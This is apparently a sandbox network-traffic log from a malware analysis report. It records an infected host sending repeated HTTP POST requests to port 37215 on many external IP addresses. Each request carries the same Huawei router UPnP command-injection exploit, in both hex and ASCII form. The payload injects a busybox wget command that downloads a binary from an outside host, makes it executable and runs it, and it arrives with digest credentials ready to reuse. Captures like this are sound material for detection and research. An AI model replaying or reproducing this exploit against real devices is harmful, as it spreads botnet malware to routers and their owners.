[TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        120192.168.2.145762641.145.12.18237215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.094027042 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        121192.168.2.1457056197.213.201.18637215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.094064951 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        122192.168.2.143858241.167.21.17837215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.094091892 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        123192.168.2.145738241.165.241.23637215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.094109058 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        124192.168.2.143462441.57.153.4337215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.094156981 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        125192.168.2.1435484156.194.188.23537215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.094177961 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        126192.168.2.145351041.40.22.3937215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.094218016 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        127192.168.2.1458452197.14.227.7337215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.094254971 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        128192.168.2.1457022197.120.240.10537215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.129553080 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        129192.168.2.1440834197.168.107.12437215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.129779100 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 38 32 2e 33 38 2e 39 34 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.82.38.94 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        130192.168.2.1456262156.230.226.22137215
                                                        TimestampBytes transferredDirectionData
                                                        Jun 13, 2024 21:31:57.129811049 CEST816OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
